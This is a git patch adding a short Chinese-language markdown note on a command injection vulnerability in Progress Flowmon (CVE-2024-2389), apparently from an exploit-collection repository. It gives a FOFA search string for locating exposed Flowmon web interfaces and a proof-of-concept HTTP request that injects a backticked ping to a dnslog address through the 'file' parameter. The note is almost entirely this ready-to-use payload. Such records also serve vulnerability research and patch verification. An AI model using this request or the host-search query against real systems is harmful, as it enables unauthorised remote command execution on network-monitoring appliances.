From 9dedbbf9d4dde14e7c74302f4622839d16ee1567 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 17 Apr 2024 19:40:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Progress-Flowmon=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(CVE-2024-2389).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...ress-Flowmon命令注入漏洞(CVE-2024-2389).md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 Progress-Flowmon命令注入漏洞(CVE-2024-2389).md

diff --git a/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md b/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md
new file mode 100644
index 0000000..dc6c561
--- /dev/null
+++ b/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md
@@ -0,0 +1,19 @@
+## Progress-Flowmon命令注入漏洞(CVE-2024-2389)
+
+
+## fofa
+```
+body="Flowmon-Web-Interface"
+```
+
+
+## poc
+```
+GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
+Connection: close
+Accept: */*
+Accept-Language: en
+Accept-Encoding: gzip
+```